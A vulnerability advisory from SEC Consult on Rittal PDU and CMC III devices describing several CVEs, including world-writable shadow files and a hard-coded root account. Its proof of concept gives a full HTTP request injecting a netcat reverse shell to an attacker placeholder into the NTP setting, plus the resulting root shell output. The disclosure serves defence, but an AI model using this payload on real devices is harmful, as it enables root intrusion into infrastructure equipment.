Vendor Description
“Since its foundation in 1961, Rittal has continuously evolved into the world’s leading systems provider for enclosures, power distribution, climate control, IT infrastructure and software & services. Today, “Rittal – The System.” offers you a perfectly coordinated system platform. It unites innovative productions, pioneering engineering solutions and global service to accommodate the most diverse requirements. It caters to a whole host of industries, from machinery and plant engineering, to the automotive industry, through to information technology. All from a single source, all in top quality.”
Business Recommendation
The vendor provides a patch which should be installed immediately, except for the PDU. There is no date for a patch for the PDU until now and it is unclear if it will be updated ever since a new PDU product will be released. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues.
Vulnerability Overview / Description
The tested devices consist of several critical vulnerabilities.
1) CLI Menu Bypass (CVE-2020-11952)
When connecting via SSH to the PDU/CMC III devices one can configure the devices via a CLI menu. It is easily possible to bypass this menu and break out to the shell on the device. An attacker is then able to access the whole filesystem with the corresponding user accounts used for SSH login and conduct further attacks.
2) Insecure Configuration of System Files (/etc/shadow & /etc/passwd) (CVE-2020-11955)
Critical OS files such as /etc/shadow and /etc/passwd are configured in an insecure way. Everybody has full read, write and executable rights for these two files. Therefore, every user who has authenticated / low privileged access to the device could elevate the privileges up to root rights by just manipulating the shadow file.
3) Hard-Coded Root Backdoor Account (CVE-2020-11951) & Weak Password Storage Algorithm
The root user account that exists on both PDU and CMC III devices, have the identical password hash within the shadow file. This indicates that once an attacker knows the password, the attacker would have access to several Rittal devices with the highest possible user rights. The root user including the password is not documented publicly. Furthermore, the MD5 hashing algorithm is being used for storing password hashes within the /etc/shadow file.
4) Outdated Software Components
The tested devices have several outdated software versions with publicly known vulnerabilities installed. The devices use outdated OpenSSL, Linux kernel and other software components. The outdated versions can also be identified by automatic firmware analysis tools such as IoT Inspector.
5) Command Injection (CVE-2020-11953) / Privilege Escalation
The NTP server setting from the web interface of the PDU and CMC III is vulnerable to a trivial command injection vulnerability when changing the IP address settings. The command gets executed as root on the device while the attacker only has to be logged on as pdu or admin user. Info: Fixed in later versions (PDU: V5.15.40/CMC III: V3.15.70_4) This vulnerability is mentioned in this advisory because devices, such as the PDU, are not updated regularly since critical servers are often attached to these PDUs. The vulnerability has been fixed by the vendor in the current firmware releases.
6) Webserver Started as Root (CVE-2020-11956)
The webserver runs as root which does not apply to the least privilege principle. Thus, a command injection vulnerability in the webserver would lead to a privilege escalation to root of the whole device.
Proof Of Concept
1) – 4)
No PoC because no fix is in prospect to date.
5) Command Injection / Privilege Escalation
To exploit the command injection in the NTP configuration perform the following steps (PDU). As a proof of concept, a reverse shell is being started:
a) Visit the web interface of either PDU or CMC III and login with default credentials pdu or admin [PIC1]
b) Go to “Settings” -> Date/Time [PIC2]
c) Enter an NTP Server (it is enforced via JavaScript to only enter numbers and dots) and intercept the request with a web proxy such as Burp.
d) Start an nc listener on the attacker’s machine: e.g. $ nc -lvp 9999
e) Click “save” and modify the request and add the following proof of concept for the IP address: $(nc <attacker-ip>:9999 -e /bin/sh) The nc syntax may vary depending on the firmware and device. Note: The commands are being run as root! The request would look similar to the following:
POST /cgi-bin/json.cgi HTTP/1.1
Host: $deviceIP
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 238
Connection: close
Cookie: SaveStateCookie=pu
setConfig={"sessionId":1556766739,"configs":[{"option":500,"value":27},{"option":502,"value":"12:58:44"},{"option":503,"value":"10.12.2019"},{"option":504,"value":1}, {"option":505,"value":"xyz $(nc $attackerIP:9999 -e /bin/sh)"},{"option":506,"value":"0.0.0.0"}]}
f) Receive the connection and be root:
$ nc -lvp 9999
listening on [any] 9999 ...
connect to [$IP] from
[$IP] 56274
#pwd
/
#whoami
Root
6) Webserver Started as Root
see 5)
Vulnerable / Tested Versions
The following two devices have been tested and found to be vulnerable:
- CMC III PU Compact (CMCIII-PU-9333E0FB)
- PDU 7955.211 (PDU-3C002DEC)
The already mentioned and the following products share the same base firmware and are affected as well according to Rittal:
- CMC III PU 7030.000 (V3.15.70_4)
- LCP-CW (V3.15.70_4)
- whole PDU device portfolio (V5.15.40_2)
- IoT Interface 3124.300 (V6.17.00)